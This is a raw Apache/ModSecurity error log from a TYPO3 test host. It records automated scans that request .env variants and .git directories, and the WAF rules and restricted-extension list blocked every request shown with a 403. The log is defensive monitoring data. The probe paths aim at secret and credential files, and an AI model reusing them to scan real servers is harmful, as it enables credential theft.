[Sat Oct 18 11:19:27.663031 2025] [:error] [pid 3573536] [client 195.178.110.159:50870] [client 195.178.110.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aPNbn98apFXlzKHq-dGavAAAAAc"]
[Sat Oct 18 11:19:27.663191 2025] [:error] [pid 3573536] [client 195.178.110.159:50870] [client 195.178.110.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aPNbn98apFXlzKHq-dGavAAAAAc"]
[Sat Oct 18 11:19:27.663328 2025] [:error] [pid 3573536] [client 195.178.110.159:50870] [client 195.178.110.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aPNbn98apFXlzKHq-dGavAAAAAc"]
[Sat Oct 18 11:19:27.686135 2025] [:error] [pid 3573536] [client 195.178.110.159:50870] [client 195.178.110.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aPNbn98apFXlzKHq-dGavQAAAAc"]
[Sat Oct 18 11:19:27.686307 2025] [:error] [pid 3573536] [client 195.178.110.159:50870] [client 195.178.110.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aPNbn98apFXlzKHq-dGavQAAAAc"]
[Sat Oct 18 11:19:27.686473 2025] [:error] [pid 3573536] [client 195.178.110.159:50870] [client 195.178.110.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aPNbn98apFXlzKHq-dGavQAAAAc"]
[Sat Oct 18 11:19:27.709734 2025] [:error] [pid 3573536] [client 195.178.110.159:50870] [client 195.178.110.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "aPNbn98apFXlzKHq-dGavgAAAAc"]
[Sat Oct 18 11:19:27.709959 2025] [:error] [pid 3573536] [client 195.178.110.159:50870] [client 195.178.110.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "aPNbn98apFXlzKHq-dGavgAAAAc"]
[Sat Oct 18 11:19:27.710152 2025] [:error] [pid 3573536] [client 195.178.110.159:50870] [client 195.178.110.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "aPNbn98apFXlzKHq-dGavgAAAAc"]
[Sat Oct 18 11:19:27.735099 2025] [:error] [pid 3573536] [client 195.178.110.159:50870] [client 195.178.110.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aPNbn98apFXlzKHq-dGavwAAAAc"]
[Sat Oct 18 11:19:27.735263 2025] [:error] [pid 3573536] [client 195.178.110.159:50870] [client 195.178.110.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aPNbn98apFXlzKHq-dGavwAAAAc"]
[Sat Oct 18 11:19:27.735410 2025] [:error] [pid 3573536] [client 195.178.110.159:50870] [client 195.178.110.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aPNbn98apFXlzKHq-dGavwAAAAc"]
[Sat Oct 18 11:19:27.759434 2025] [:error] [pid 3573536] [client 195.178.110.159:50870] [client 195.178.110.159] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aPNbn98apFXlzKHq-dGawAAAAAc"]
[Sat Oct 18 11:19:27.759588 2025] [:error] [pid 3573536] [client 195.178.110.159:50870] [client 195.178.110.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aPNbn98apFXlzKHq-dGawAAAAAc"]
[Sat Oct 18 11:19:27.759735 2025] [:error] [pid 3573536] [client 195.178.110.159:50870] [client 195.178.110.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aPNbn98apFXlzKHq-dGawAAAAAc"]
[Sat Oct 18 11:19:27.759903 2025] [:error] [pid 3573536] [client 195.178.110.159:50870] [client 195.178.110.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aPNbn98apFXlzKHq-dGawAAAAAc"]
[Sat Oct 18 17:47:28.836137 2025] [authz_core:error] [pid 3576599] [client 35.197.7.229:46052] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sat Oct 18 19:53:22.462107 2025] [authz_core:error] [pid 3576300] [client 45.148.10.204:62264] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Mon Oct 20 09:38:05.558825 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aPXm3X42o4RRfFLcfyiFBgAAAAc"]
[Mon Oct 20 09:38:05.561240 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aPXm3X42o4RRfFLcfyiFBgAAAAc"]
[Mon Oct 20 09:38:05.561439 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aPXm3X42o4RRfFLcfyiFBgAAAAc"]
[Mon Oct 20 09:38:05.675011 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aPXm3X42o4RRfFLcfyiFBwAAAAc"]
[Mon Oct 20 09:38:05.675232 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aPXm3X42o4RRfFLcfyiFBwAAAAc"]
[Mon Oct 20 09:38:05.675439 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aPXm3X42o4RRfFLcfyiFBwAAAAc"]
[Mon Oct 20 09:38:05.979173 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aPXm3X42o4RRfFLcfyiFCAAAAAc"]
[Mon Oct 20 09:38:05.979381 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aPXm3X42o4RRfFLcfyiFCAAAAAc"]
[Mon Oct 20 09:38:05.979581 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aPXm3X42o4RRfFLcfyiFCAAAAAc"]
[Mon Oct 20 09:38:06.218362 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /wp-content/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-content/.env"] [unique_id "aPXm3n42o4RRfFLcfyiFCgAAAAc"]
[Mon Oct 20 09:38:06.218571 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-content/.env"] [unique_id "aPXm3n42o4RRfFLcfyiFCgAAAAc"]
[Mon Oct 20 09:38:06.218778 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-content/.env"] [unique_id "aPXm3n42o4RRfFLcfyiFCgAAAAc"]
[Mon Oct 20 09:38:06.328424 2025] [authz_core:error] [pid 3623218] [client 3.94.103.221:49695] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Mon Oct 20 09:38:06.439378 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aPXm3n42o4RRfFLcfyiFDAAAAAc"]
[Mon Oct 20 09:38:06.439593 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aPXm3n42o4RRfFLcfyiFDAAAAAc"]
[Mon Oct 20 09:38:06.439804 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aPXm3n42o4RRfFLcfyiFDAAAAAc"]
[Mon Oct 20 09:38:06.556001 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aPXm3n42o4RRfFLcfyiFDQAAAAc"]
[Mon Oct 20 09:38:06.556204 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aPXm3n42o4RRfFLcfyiFDQAAAAc"]
[Mon Oct 20 09:38:06.556413 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aPXm3n42o4RRfFLcfyiFDQAAAAc"]
[Mon Oct 20 09:38:06.682743 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aPXm3n42o4RRfFLcfyiFDgAAAAc"]
[Mon Oct 20 09:38:06.682958 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aPXm3n42o4RRfFLcfyiFDgAAAAc"]
[Mon Oct 20 09:38:06.683163 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aPXm3n42o4RRfFLcfyiFDgAAAAc"]
[Mon Oct 20 09:38:06.791839 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aPXm3n42o4RRfFLcfyiFDwAAAAc"]
[Mon Oct 20 09:38:06.792051 2025] [:error] [pid 3623218] [client 3.94.103.221:49695] [client 3.94.103.221] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aPXm3n42o4RRfFLcfyiFDwAAAAc"]
